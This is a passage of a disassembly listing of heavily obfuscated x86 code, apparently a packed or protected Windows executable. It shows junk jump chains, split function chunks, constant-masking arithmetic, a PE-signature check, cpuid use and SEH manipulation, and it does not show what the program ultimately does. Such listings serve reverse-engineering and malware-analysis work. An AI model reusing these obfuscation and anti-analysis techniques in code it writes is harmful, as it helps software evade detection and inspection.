loc_42E557: ; CODE XREF: sub_423A2A+1D29�j
jbe loc_42DB84
jmp loc_42B418
; END OF FUNCTION CHUNK FOR sub_423A2A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_150. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428AC9
loc_42E563: ; CODE XREF: sub_428AC9+13�j
jmp loc_42ED39
; END OF FUNCTION CHUNK FOR sub_428AC9
; ---------------------------------------------------------------------------
loc_42E568: ; CODE XREF: _0182ofla:00423B76�j
jmp loc_4285D3
; ---------------------------------------------------------------------------
test edi, eax
jmp loc_42AB38
; =============== S U B R O U T I N E =======================================
sub_42E574 proc near ; CODE XREF: sub_424184:loc_42A543�p
; _0182ofla:0042CD85�j
xchg ecx, [esp+0]
pop ecx
add edx, 9EA43879h
add edx, ebp
jmp loc_42D4D4
sub_42E574 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E585 proc near ; DATA XREF: sub_4281B9+36E0�o
; FUNCTION CHUNK AT 00423658 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00427EA9 SIZE 00000006 BYTES
add eax, ebp
add eax, 0BEABAE19h
call sub_42E825
loc_42E592: ; CODE XREF: sub_42798F+5D63�j
jmp loc_423658
sub_42E585 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_42E597: ; CODE XREF: sub_425B6E:loc_4242E7�j
pop edi
rol edi, 1
cmp edi, 0BEDD4221h
jmp loc_4264DD
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_42E5A5: ; CODE XREF: sub_428EB9:loc_4250BE�j
add ecx, 4
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 0A0h
mov dword ptr [ecx], offset loc_427DD8
xor eax, eax
jmp loc_42AA1D
; END OF FUNCTION CHUNK FOR sub_428EB9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_218. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B14D
loc_42E5C9: ; CODE XREF: sub_42B14D+6�j
jmp nullsub_172
; END OF FUNCTION CHUNK FOR sub_42B14D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429203
loc_42E5CE: ; CODE XREF: sub_429203+CB9�j
jmp sub_428D17
; END OF FUNCTION CHUNK FOR sub_429203
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AAF8
loc_42E5D3: ; CODE XREF: sub_427DFA:loc_424C7A�j
; sub_42AAF8+371�j
jz loc_425F7E
jmp loc_423FC8
; END OF FUNCTION CHUNK FOR sub_42AAF8
; ---------------------------------------------------------------------------
mov ds:dword_4257A4, eax
; START OF FUNCTION CHUNK FOR sub_428F0F
loc_42E5E3: ; CODE XREF: sub_428F0F:loc_42ACC4�j
lea eax, [ebp-14h]
xor edx, edx
call sub_42B14D
jmp loc_426B8B
; END OF FUNCTION CHUNK FOR sub_428F0F
; ---------------------------------------------------------------------------
loc_42E5F2: ; CODE XREF: _0182ofla:00424EB3�j
sub ecx, 0EF90518h
; =============== S U B R O U T I N E =======================================
sub_42E5F8 proc near ; CODE XREF: sub_42883C:loc_42D5A9�p
; FUNCTION CHUNK AT 00425F1A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00429786 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429EDD SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042A729 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042ADCA SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042CF73 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D477 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E858 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
mov eax, [ebp-4]
cmp dword ptr [eax], 4550h
jmp loc_429786
sub_42E5F8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427239
loc_42E60A: ; CODE XREF: sub_427239-2C45�j
mov eax, [eax]
or eax, eax
jnz loc_425512
jmp loc_42C5DA
; END OF FUNCTION CHUNK FOR sub_427239
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_214. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42E61A: ; CODE XREF: sub_423FCD:loc_4237AC�j
; sub_42D978:loc_425CE2�j
jz sub_42D430
jmp loc_426519
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
jnb loc_42ADA5
jmp sub_4256AD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_184. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4254D3
loc_42E631: ; CODE XREF: sub_4254D3+77E5�j
jmp nullsub_174
; END OF FUNCTION CHUNK FOR sub_4254D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42E636: ; CODE XREF: sub_42D056-925C�j
jmp loc_42887D
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D833
loc_42E63B: ; CODE XREF: sub_42D833:loc_4294A5�j
push eax
push ebx
push 0E18E05EDh
pop ebx
jmp loc_4234EB
; END OF FUNCTION CHUNK FOR sub_42D833
; =============== S U B R O U T I N E =======================================
sub_42E648 proc near ; CODE XREF: _0182ofla:loc_425354�p
; _0182ofla:0042923D�j
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042482D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425B87 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428EDB SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042A7DA SIZE 00000014 BYTES
xchg ebx, [esp+4+var_4]
pop ebx
xchg ecx, [esp+0]
jmp loc_425B87
sub_42E648 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov [esi], eax
jmp loc_428CD5
; ---------------------------------------------------------------------------
and ecx, eax
jmp sub_4230AC
; ---------------------------------------------------------------------------
loc_42E662: ; CODE XREF: _0182ofla:0042B05E�j
sub ebx, 98FD9BF7h
; =============== S U B R O U T I N E =======================================
sub_42E668 proc near ; CODE XREF: sub_428A39:loc_42950D�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042333E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042B28E SIZE 00000005 BYTES
mov [esp+0], edx
loc_42E66B: ; CODE XREF: _0182ofla:loc_4242F7�j
; _0182ofla:loc_42A35C�j
pop edx
push edx
push eax
mov eax, [ebp-18h]
jmp loc_42B28E
sub_42E668 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test edx, edi
jmp loc_42EAEA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42E67D: ; CODE XREF: sub_42798F-2674�j
cdq
jnz loc_4240A3
jmp loc_429013
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_42E689 proc near ; DATA XREF: sub_425E4D+5201�o
; FUNCTION CHUNK AT 004250DA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004256F7 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00425784 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427572 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004282D6 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00428329 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429625 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042A044 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042A49F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B6BB SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042C969 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042EBB7 SIZE 00000005 BYTES
or eax, eax
jnz loc_42C969
jmp loc_42A49F
sub_42E689 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_42E696: ; CODE XREF: _0182ofla:0042A892�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427239
loc_42E697: ; CODE XREF: _0182ofla:004288B5�j
; sub_427239:loc_42C794�j
jmp loc_42AC19
; END OF FUNCTION CHUNK FOR sub_427239
; ---------------------------------------------------------------------------
loc_42E69C: ; CODE XREF: _0182ofla:loc_424734�j
add eax, ebp
add eax, 0C73808C3h
push eax
push 400000h
mov eax, [ebp-10h]
loc_42E6AD: ; CODE XREF: _0182ofla:004258F0�j
push eax
push edx
push 0AF919A83h
jmp loc_429971
; ---------------------------------------------------------------------------
loc_42E6B9: ; CODE XREF: _0182ofla:00423D0B�j
sbb esi, 110D72EEh
; =============== S U B R O U T I N E =======================================
sub_42E6BF proc near ; CODE XREF: sub_42662C:loc_4241F8�p
; FUNCTION CHUNK AT 0042C192 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042D2E8 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042D374 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DA8C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042E00F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E998 SIZE 0000000D BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, [eax]
call sub_423FE2
loc_42E6CA: ; CODE XREF: sub_423114+ACAA�j
jmp loc_42E998
sub_42E6BF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E6CF proc near ; DATA XREF: sub_428110:loc_42DCB2�o
call sub_428D09
mov edx, 9E99B23Eh
call sub_42D71D
call sub_42860D
sub_42E6CF endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_429597
loc_42E6E3: ; CODE XREF: sub_429597+9�j
jmp loc_42D1BC
; END OF FUNCTION CHUNK FOR sub_429597
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42E6E8: ; CODE XREF: sub_4253F4:loc_427CCB�j
ja loc_4259A9
jmp loc_423554
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
mov [edx], ecx
jmp sub_424E6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42E6FA: ; CODE XREF: sub_42798F+1AEC�j
shl ebp, 9
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_42E6FD proc near ; CODE XREF: sub_425BF8+9183�p
mov [esp+0], ecx
pop ecx
cmp eax, 0FFFFFFFFh
push offset loc_42D4B1
jmp nullsub_176
sub_42E6FD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429C68
loc_42E70E: ; CODE XREF: sub_429C68:loc_42A2CA�j
mov eax, ds:dword_4231A0
or eax, eax
jnz loc_42AD33
jmp loc_427EF4
; END OF FUNCTION CHUNK FOR sub_429C68
; ---------------------------------------------------------------------------
cmp ebx, 6359571Ah
jmp loc_42CD65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42E72C: ; CODE XREF: sub_42798F+3C26�j
shr edx, 16h
jmp loc_424B57
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_42E734 proc near ; CODE XREF: sub_42CC99�j
; DATA XREF: sub_4271AD+5AE2�o
; FUNCTION CHUNK AT 0042515C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042CA83 SIZE 00000005 BYTES
push 0
call sub_425C89
jmp loc_42CA83
sub_42E734 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42E740: ; CODE XREF: sub_423FCD�j
mov eax, ds:dword_42577C
or eax, eax
jnz loc_42C895
jmp loc_42A0A7
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
sbb esi, ebx
add eax, 0B22C9754h
jmp sub_424184
; ---------------------------------------------------------------------------
loc_42E760: ; CODE XREF: _0182ofla:loc_42906C�j
mov [ebp-4], eax
push 1Ch
push 0BABD04E9h
pop eax
add eax, 0DF468A2Eh
jmp loc_42ADBB
; ---------------------------------------------------------------------------
sub edi, edx
jmp sub_42E7E3
; =============== S U B R O U T I N E =======================================
sub_42E77D proc near ; CODE XREF: sub_429E52-50CD�p
; _0182ofla:0042D61E�j
arg_0 = dword ptr 4
mov [esp+0], edx
pop edx
xchg ebx, [esp-4+arg_0]
retn
sub_42E77D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E785 proc near ; DATA XREF: sub_429E52-50D2�o
; FUNCTION CHUNK AT 00424358 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042572D SIZE 00000004 BYTES
xor ebx, 0B9B3A829h
and ebx, 6EAF043Fh
add ebx, 97B56D4Ah
jmp loc_424358
sub_42E785 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E79C proc near ; CODE XREF: sub_426CC3+5�p
; _0182ofla:00429F43�j
; FUNCTION CHUNK AT 00427225 SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
push 4F7C309Dh
pop esi
and esi, 3AB11CD5h
or esi, 0ED1BEBCDh
jmp loc_427225
sub_42E79C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test al, al
jz loc_4283F9
jmp loc_429D06
; ---------------------------------------------------------------------------
not ecx
jmp loc_42D976
; ---------------------------------------------------------------------------
push offset sub_42C58A
jmp locret_4256F6
; ---------------------------------------------------------------------------
byte_42E7D5 db 0F2h, 0CCh, 0E9h ; CODE XREF: sub_429B91+C�j
dd 0FFFF8737h, 8DE9E887h
db 63h, 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_42E7E3 proc near ; CODE XREF: sub_428AB5�p
; _0182ofla:0042E778�j
arg_0 = dword ptr 4
xchg ebx, [esp+0]
pop ebx
xchg eax, [esp-4+arg_0]
mov eax, [esp-4+arg_0]
xchg eax, ecx
push ecx
push offset sub_427E90
jmp nullsub_219
sub_42E7E3 endp
; ---------------------------------------------------------------------------
loc_42E7FA: ; CODE XREF: _0182ofla:004258D2�j
jnz loc_4292C4
jmp loc_428D98
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4242AC
loc_42E805: ; CODE XREF: sub_4242AC:loc_429351�j
pop ebx
xor ebx, 0BFE0BD97h
add ebx, 0BA03AA94h
xchg ebx, [esp+4+var_4]
jmp sub_42A00A
; END OF FUNCTION CHUNK FOR sub_4242AC
; ---------------------------------------------------------------------------
xor ebx, 0B41E8C35h
jmp loc_42ECF0
; =============== S U B R O U T I N E =======================================
sub_42E825 proc near ; CODE XREF: _0182ofla:00426D72�j
; sub_42E585+8�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00426E15 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
popf
push ebx
mov [esp-4+arg_0], eax
jmp loc_426E15
sub_42E825 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42E833: ; CODE XREF: sub_428F20:loc_429811�j
jp loc_4270A8
rol esi, 0Eh
jmp loc_4246A6
; END OF FUNCTION CHUNK FOR sub_428F20
; =============== S U B R O U T I N E =======================================
sub_42E841 proc near ; CODE XREF: sub_424E36+6�p
; _0182ofla:00427E5B�j
mov [esp+0], edx
pop edx
pop ecx
push esi
pushf
jmp loc_42EB0E
sub_42E841 endp
; ---------------------------------------------------------------------------
loc_42E84D: ; CODE XREF: _0182ofla:loc_42D0C3�j
jz loc_42D845
; START OF FUNCTION CHUNK FOR sub_42537E
loc_42E853: ; CODE XREF: sub_42537E+837F�j
jmp loc_4272BE
; END OF FUNCTION CHUNK FOR sub_42537E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E5F8
loc_42E858: ; CODE XREF: sub_42E5F8-167F�j
jmp loc_42ADCA
; END OF FUNCTION CHUNK FOR sub_42E5F8
; ---------------------------------------------------------------------------
jb loc_4296A8
jmp loc_42D844
; ---------------------------------------------------------------------------
loc_42E868: ; CODE XREF: _0182ofla:00425D1F�j
jnp loc_42E368
xchg ecx, eax
loc_42E870: ; CODE XREF: _0182ofla:loc_42650E�j
call sub_42326C
push offset sub_42DFFB
jmp loc_425D3C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231F3
loc_42E87F: ; CODE XREF: sub_4231F3+5�j
; sub_4268FC+9�j ...
jb loc_423209
add edx, 14h
mov ecx, [ebx+edx-8]
or ecx, ecx
jz loc_42D510
push offset sub_4231F3
jmp loc_427154
; END OF FUNCTION CHUNK FOR sub_4231F3
; ---------------------------------------------------------------------------
sbb eax, 403E6635h
jmp loc_42DDA4
; ---------------------------------------------------------------------------
cmp esi, ebp
jmp loc_427C97
; ---------------------------------------------------------------------------
loc_42E8B0: ; DATA XREF: sub_4251FB+A�o
mov ebp, esp
push ecx
push offset sub_42CE01
jmp loc_424B47
; ---------------------------------------------------------------------------
db 92h, 11h, 45h
dword_42E8C0 dd 0CBBF38DCh ; DATA XREF: sub_42A420:loc_428079�w
; sub_42A420:loc_42A428�r
dword_42E8C4 dd 85A69DF9h ; DATA XREF: sub_42448C:loc_425FBB�r
; sub_429AB1:loc_428322�w ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425126
loc_42E8C8: ; CODE XREF: sub_425126+B�j
jmp nullsub_178
; END OF FUNCTION CHUNK FOR sub_425126
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_42E8CD: ; CODE XREF: sub_425B6E-28A6�j
jmp nullsub_179
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
dw 0F02Fh
dword_42E8D4 dd 0F3D04CBBh ; DATA XREF: _0182ofla:004232E5�w
; sub_426020+7376�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42940E
loc_42E8D8: ; CODE XREF: sub_42940E-2403�j
jmp loc_42D0D5
; END OF FUNCTION CHUNK FOR sub_42940E
; ---------------------------------------------------------------------------
db 0BDh, 52h, 4Fh
dd 7166F77Eh
dword_42E8E4 dd 0F39B51BBh ; DATA XREF: sub_42B669:loc_42989C�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_42E8E8: ; CODE XREF: sub_42537E+728F�j
jmp loc_42D6F7
; END OF FUNCTION CHUNK FOR sub_42537E
; ---------------------------------------------------------------------------
db 0Fh, 0A4h, 19h
dword_42E8F0 dd 223BF3F8h ; DATA XREF: sub_428176:loc_42855D�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CC59
loc_42E8F4: ; CODE XREF: sub_42CC59-6362�j
mov [edx], eax
call sub_42C870
; END OF FUNCTION CHUNK FOR sub_42CC59
; START OF FUNCTION CHUNK FOR sub_424A70
loc_42E8FB: ; CODE XREF: sub_424A70+1D5D�j
mov eax, [eax]
mov edx, [ebp-8]
xchg eax, [edx]
xor [ebp-4], eax
cmp dword ptr [ebp-4], 0
setnz byte ptr [ebp-9]
mov al, [ebp-9]
jmp loc_4257D4
; END OF FUNCTION CHUNK FOR sub_424A70
; ---------------------------------------------------------------------------
add esi, 3EDB3387h
jmp loc_42912A
; ---------------------------------------------------------------------------
not ebx
jmp sub_42B15E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_137. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_42E928: ; CODE XREF: sub_42660C+6995�j
jmp loc_426274
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
loc_42E92D: ; CODE XREF: _0182ofla:0042B3DE�j
jmp loc_426E27
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_10. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AE14
loc_42E933: ; CODE XREF: sub_42AE14+12�j
jmp sub_42D71D
; END OF FUNCTION CHUNK FOR sub_42AE14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1B2
loc_42E938: ; CODE XREF: sub_42C1B2-7A5C�j
; _0182ofla:004281E0�j
mov eax, [ebp-4]
push eax
call sub_4278DB
jmp loc_427C5B
; END OF FUNCTION CHUNK FOR sub_42C1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D387
loc_42E946: ; CODE XREF: sub_42D387:loc_42AAAE�j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push offset loc_424122
jmp nullsub_181
; END OF FUNCTION CHUNK FOR sub_42D387
; ---------------------------------------------------------------------------
loc_42E959: ; CODE XREF: _0182ofla:loc_42DEB0�j
jnz loc_42B8C4
jmp loc_42AD7B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428729
loc_42E964: ; CODE XREF: sub_428729:loc_42CEEB�j
add eax, 81F02C95h
mov eax, [eax]
push ebx
pushf
jmp loc_4244CD
; END OF FUNCTION CHUNK FOR sub_428729
; ---------------------------------------------------------------------------
add edi, 6C69A3C4h
jmp loc_4299B6
; =============== S U B R O U T I N E =======================================
sub_42E97E proc near ; CODE XREF: sub_42798F:loc_42721A�j
; FUNCTION CHUNK AT 00427AE5 SIZE 00000007 BYTES
push ebx
push 1B9F2781h
pop ebx
add ebx, 0D65352CEh
add ebx, ebp
add ebx, 0E0D85ADh
jmp loc_427AE5
sub_42E97E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E6BF
loc_42E998: ; CODE XREF: sub_42E6BF:loc_42E6CA�j
test al, al
jz loc_42C192
jmp loc_42E00F
; END OF FUNCTION CHUNK FOR sub_42E6BF
; =============== S U B R O U T I N E =======================================
sub_42E9A5 proc near ; DATA XREF: sub_42E689:loc_4250DA�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00427198 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004276F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427FDA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042813D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042EB41 SIZE 0000000D BYTES
push ebx
push 8E107A61h
pop ebx
xor ebx, 5B8A659Eh
test ebx, 20000000h
jmp loc_42EB41
sub_42E9A5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_42E9BD: ; CODE XREF: sub_425B6E-9CE�j
xor ecx, ecx
xor edx, edx
cpuid
add [esi], eax
xor [esi], ebx
jmp loc_428ABA
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
loc_42E9CC: ; CODE XREF: _0182ofla:00426139�j
; _0182ofla:loc_42C207�j
call sub_42771F
; START OF FUNCTION CHUNK FOR sub_4253DC
loc_42E9D1: ; CODE XREF: sub_4253DC+6�j
jmp loc_423C9E
; END OF FUNCTION CHUNK FOR sub_4253DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_42E9D6: ; CODE XREF: sub_428EB9:loc_426F27�j
mov eax, [ebp+8]
or dword ptr [eax-8], 8
jmp loc_427C1A
; ---------------------------------------------------------------------------
loc_42E9E2: ; CODE XREF: sub_428EB9-5CA1�j
; sub_428EB9-5C94�j
js loc_42918F
cmp dword ptr [ebp-10h], 0
jnz loc_42AC56
mov eax, [ebp+8]
push eax
cmp dword ptr [ebp-14h], 6
jmp loc_42917B
; END OF FUNCTION CHUNK FOR sub_428EB9
; =============== S U B R O U T I N E =======================================
sub_42E9FF proc near ; DATA XREF: sub_4283EF:loc_4283F9�o
arg_4 = dword ptr 8
pop ecx
pop ecx
mov ebp, offset nullsub_224
xchg ebp, [esp-8+arg_4]
retn
sub_42E9FF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4267F8
loc_42EA0A: ; CODE XREF: sub_4267F8-2F36�j
jmp loc_42C3FD
; END OF FUNCTION CHUNK FOR sub_4267F8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_224. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4266D1
loc_42EA10: ; CODE XREF: sub_4266D1+7�j
jmp sub_42CA29
; END OF FUNCTION CHUNK FOR sub_4266D1
; =============== S U B R O U T I N E =======================================
sub_42EA15 proc near ; CODE XREF: sub_4253F4:loc_4274F4�p
; sub_42D056:loc_42D419�p
var_C = dword ptr -0Ch
; FUNCTION CHUNK AT 00427148 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428AEF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428C68 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042DFE7 SIZE 00000014 BYTES
push large dword ptr fs:0
mov large fs:0, esp
jmp loc_428AEF
sub_42EA15 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D730
loc_42EA28: ; CODE XREF: sub_42D730:loc_4247F9�j
pop ebp
push 386E1C24h
pop eax
add eax, 0C7D4552Ch
jmp loc_42316C
; END OF FUNCTION CHUNK FOR sub_42D730
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_239. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424072
loc_42EA3B: ; CODE XREF: sub_424072:loc_427CB3�j
jnz loc_42679E
retn
; END OF FUNCTION CHUNK FOR sub_424072
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E376
loc_42EA42: ; CODE XREF: sub_42E376+A�j
jmp loc_427CC2
; END OF FUNCTION CHUNK FOR sub_42E376
; =============== S U B R O U T I N E =======================================
sub_42EA47 proc near ; CODE XREF: sub_42C6EB:loc_42C6F7�p
mov eax, large fs:0
sub_42EA47 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_425BED
loc_42EA4E: ; CODE XREF: sub_425BED+4�j
; sub_42E178:loc_427834�j
jnb loc_427840
cmp dword ptr [eax], 0FFFFFFFFh
mov ebx, [eax+4]
mov eax, [eax]
jmp loc_42E17E
; END OF FUNCTION CHUNK FOR sub_425BED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42310C
loc_42EA61: ; CODE XREF: sub_42310C:loc_4298C1�j
push ecx
mov esp, ebp
call sub_428A5F
loc_42EA69: ; CODE XREF: sub_42A6D5-4133�j
; DATA XREF: sub_42C677-443�o
pop dword ptr fs:0
xchg eax, [esp+0]
pop eax
push 1
lea eax, [ebp+var_806]
call sub_427D89
; END OF FUNCTION CHUNK FOR sub_42310C
; START OF FUNCTION CHUNK FOR sub_427B02
loc_42EA80: ; CODE XREF: sub_427B02+B6F�j
; DATA XREF: sub_42380D+7000�o
pop dword ptr fs:0
xchg eax, [esp+0]
pop eax
mov [esp-4+arg_0], eax
retn
; END OF FUNCTION CHUNK FOR sub_427B02
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428718
loc_42EA8E: ; CODE XREF: sub_428718+6�j
jmp loc_4274DD
; END OF FUNCTION CHUNK FOR sub_428718
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4235C7
loc_42EA93: ; CODE XREF: sub_4235C7+C�j
push ecx
mov esp, ebp
xchg esi, [esp+4+var_4]
mov ebp, esi
pop esi
push 11C42E4Ah
pop eax
or eax, 437AC239h
jmp loc_42B391
; END OF FUNCTION CHUNK FOR sub_4235C7
; ---------------------------------------------------------------------------
mov esi, 4770526Dh
jmp loc_42537C
; =============== S U B R O U T I N E =======================================
sub_42EAB7 proc near ; CODE XREF: sub_42349B+9C30�p
; _0182ofla:0042D56A�j
; FUNCTION CHUNK AT 00423BF9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426B77 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004285F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004287CC SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00428C9D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004290F0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00429836 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00429B8C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A9AC SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0042AA1F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C3BB SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042C743 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042D607 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042DFB6 SIZE 00000005 BYTES
mov [esp+0], ecx
pop ecx
mov [ebp-0Ch], eax
loc_42EABE: ; CODE XREF: sub_426B60+12�j
; sub_42A3E4:loc_42A988�j ...
mov eax, [ebp-20h]
movzx eax, byte ptr [eax]
mov [ebp-1Ch], eax
jb loc_429836
jmp loc_4290F0
sub_42EAB7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42EAD2: ; CODE XREF: _0182ofla:0042933D�j
xor [ebp-4], eax
cmp dword ptr [ebp-4], 0
setnz byte ptr [ebp-9]
push edx
push 9826C7D0h
and edx, ecx
jmp loc_42A088
